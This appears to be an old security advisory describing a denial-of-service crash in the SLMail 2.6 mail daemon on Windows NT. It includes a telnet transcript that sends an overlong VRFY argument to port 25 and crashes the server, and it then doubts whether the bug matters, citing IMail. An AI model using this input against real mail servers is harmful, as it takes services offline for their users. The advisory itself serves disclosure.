COMMAND

    Seattle Lab Sendmail 2.6

SYSTEMS AFFECTED

    WinNT

PROBLEM

    Steven  has  recently  found  a  quite  serious DoS attack for the
    SLMail  2.6  email  daemon  (www.seattlelabs.com/slmail).  A  long
    string of text after a command makes the program crash.  This  was
    only tested n 2.6, so no info if other versions are vulnerable.

	craphole:~$ telnet www.victim.com 25
	Trying 555.55.555.55...
	Connected to www.victim.com.
	Escape character is '^]'.
	220 www.victim.com Smtp Server SLMail v2.6 Ready ESMTP spoken here
	vrfy
	dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
	dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
	dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
	dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
	dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
	dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
	dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
	dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
	Connection closed by foreign host.

	craphole:~$ telnet www.victim.com 25
	Trying 555.55.555.55...
	telnet: Unable to connect to remote host: Connection refused
	craphole:~$

SOLUTION

    Similar is with IMail.  It is  not clear if this is the case  with
    SLMail, but however let's  say if this is  the case as with  IMail
    then this  all is  bogus because  that "bug"  by the  way, doesn't
    cause IMail any problems.   It only causes the "hacker"  a problem
    since  IMail  won't  release  the  connection and won't accept any
    more input from them until they drop the connection and reconnect.
    It does not  affect any other  sessions to the  SMTP server.   The
    session  does  drop  cleanly  freeing  all  resources  as designed
    either when the "hacker" breaks the connection or when the timeout
    occurs,  whichever  occurs  first.   Let's  repeat,  it is not yet
    clear if this is the case with SLMail.